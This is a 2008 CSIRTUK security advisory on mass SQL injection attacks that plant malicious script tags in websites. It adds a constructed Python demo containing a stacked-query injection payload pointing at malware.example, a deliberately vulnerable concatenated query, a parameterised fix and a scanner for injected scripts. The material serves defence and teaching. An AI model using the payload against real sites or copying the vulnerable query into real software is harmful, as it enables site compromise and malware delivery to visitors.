ID: 3618
Date: 23/05/2008
Title: 3618 - Mass SQL Injection attacks
Platform level affected: Net Application - Server
Hardware components affected: Intel PC
Specific operating systems components affected: 32-bit Windows
Net-enabled software: Web Server
Security software: Other
Other software: Web Browser
Remediation Summary: CPNI are monitoring the situation and will publish further advice if the risks change.
Vendors affected:N/A
Applications affected:N/A
Adversity source: Unknown
Attack Vector: Vulnerability exploitation
Virulence: Unknown
Warning Status: Active
Potential Damage: Remote execution/modification
Possible Duration: Open Ended
Availability of fix: Available
Type of fix: Patch
Source: N/A
Reliability of source: Trusted
Source URL: N/A
CVE: N/A
Abstract: CSIRTUK are aware of an increase in SQL injection attacks; the following advisory reinforces established best practice guidance.
Mass SQL Injection attacks
Background
There have been a number of recent incident and media reports of websites being compromised through SQL injection. Once a site is compromised, an additional script is added to one or more of its web pages; this redirects visitors to another site hosting malware that attempts to exploit vulnerabilities on the visitor's system. Patches for most of these vulnerabilities have already been issued but may not yet have been installed by the system owner, leaving that system open to attack.
A list of some of the sites containing the malware involved in the incident can be found at:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Recommendations
1. System administrators should review their patching procedures and install any missing updates.
2. Block all inbound and outbound connections to the domains listed in the link above.
3. Webmasters should check their websites for unauthorised modifications, specifically injected HTML script tags, and remove these if present. Because the injection is performed through SQL, the tag may sit in stored database content that is rendered into pages, so that content should be checked as well as the page templates.
4. Web developers should identify and correct any input validation errors in their website code; in particular, database queries should be built from parameterised statements rather than by concatenating user-supplied input into SQL text.
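The following is an added example, not code from CPNI/CSIRTUK or from any of the sources linked in this advisory, covering recommendations 3 and 4 together. It is entirely constructed: the schema, rows, page template, the injected-tag payload and the domain malware.example are assumptions for illustration, and it uses Python's built-in sqlite3 module so that it runs offline. It shows a concatenated query letting a stacked UPDATE write a script tag into every stored article, the parameterised query that neutralises the same input, and a scan of both the rendered page and the stored data for script tags loaded from hosts the site does not own.

```python
# Added example for recommendations 3 and 4 (not the advisory's own code).
# Constructed schema, rows, payload and hypothetical domain malware.example.
import sqlite3
from html.parser import HTMLParser
from urllib.parse import urlparse

SCHEMA = "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
ROWS = [("Welcome", "Hello world"), ("Maintenance", "Site down on Sunday")]
OWN_HOSTS = {"www.example.org"}  # hosts whose scripts the site legitimately loads

# Payload in the shape the advisory describes: it ends the intended query and
# appends an UPDATE that tacks a script tag onto every stored article body.
INJECTED_TAG = '<script src="http://malware.example/x.js"></script>'
PAYLOAD = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'; --"


def fresh_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def handle_request_vulnerable(conn, raw_id):
    """Input-validation error: the request parameter is concatenated into the
    SQL text. executescript() runs stacked statements, modelling a database
    layer that accepts batches (sqlite3.execute() would refuse them)."""
    sql = "SELECT title, body FROM news WHERE id = " + str(raw_id) + " ORDER BY id"
    conn.executescript(sql)  # the attacker's UPDATE runs; '--' hides the tail
    conn.commit()


def handle_request_safe(conn, raw_id):
    """Corrected form: a parameterised query binds the value as data, never SQL."""
    cur = conn.execute("SELECT title, body FROM news WHERE id = ?", (raw_id,))
    return cur.fetchall()


def render_page(conn):
    """Constructed template: stored bodies are emitted as raw HTML, which is how
    a stored script tag reaches every visitor."""
    parts = ["<html><body>"]
    for title, body in conn.execute("SELECT title, body FROM news ORDER BY id"):
        parts.append("<h2>%s</h2><p>%s</p>" % (title, body))
    parts.append('<script src="/static/site.js"></script></body></html>')
    return "".join(parts)


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_foreign_scripts(html, own_hosts=OWN_HOSTS):
    """Recommendation 3: script sources loading from hosts the site does not
    own. Relative URLs have no host and count as local; protocol-relative
    '//host/x.js' URLs are resolved to their host and checked too."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    foreign = []
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host and host.lower() not in own_hosts:
            foreign.append(src)
    return foreign


def count_stored_script_tags(conn):
    """Check the data too: SQL injection writes the tag into stored content."""
    row = conn.execute("SELECT COUNT(*) FROM news WHERE body LIKE '%<script%'").fetchone()
    return row[0]


def demo():
    """Run the payload against both handlers and scan the results."""
    vulnerable = fresh_db()
    foreign_before = find_foreign_scripts(render_page(vulnerable))
    handle_request_vulnerable(vulnerable, PAYLOAD)        # stacked UPDATE executes
    foreign_after = find_foreign_scripts(render_page(vulnerable))
    safe = fresh_db()
    rows_for_payload = handle_request_safe(safe, PAYLOAD)  # no match, no UPDATE
    rows_for_id = handle_request_safe(safe, "1")
    return {
        "foreign_before": foreign_before,
        "foreign_after": foreign_after,
        "stored_tags_vulnerable": count_stored_script_tags(vulnerable),
        "stored_tags_safe": count_stored_script_tags(safe),
        "safe_rows_for_payload": rows_for_payload,
        "safe_rows_for_id": rows_for_id,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Running `demo()` shows the vulnerable handler leaving a foreign script tag in every article and two tagged rows in the table, while the parameterised handler returns no rows for the payload and leaves the data untouched. Binding the parameter is the decisive fix; converting the identifier with `int()` before the query is a cheap extra validation layer that rejects the payload outright. The scanner is only as good as its list of owned hosts, so it should be run against the live pages and the database content, not just the templates in source control.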
Additional Useful URLs:
http://en.wikipedia.org/wiki/SQL_injection
http://isc.incidents.org/diary.html?storyid=4439
http://www.f-secure.com/weblog/archives/00001427.html
http://www.techworld.com/security/news/index.cfm?newsid=101510
This advisory contains information released by the original author. Some of the information may have changed since it was released. If the issue affects you, it may be prudent to retrieve the advisory from the site of the original source to ensure that you receive the most current information concerning that problem. Reference to any specific commercial product, process, or service by trade name, trademark manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by CPNI.
The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes. CPNI shall not accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this advisory.
CSIRTUK is a member of the Forum of Incident Response and Security Teams (FIRST) and has contacts with other international Incident Response Teams (IRTs) in order to foster cooperation and coordination in incident prevention, to prompt rapid reaction to incidents, and to promote information sharing amongst its members and the community at large.
Fri, 23 May 2008 10:00:00 GMT
Domain affected: Technical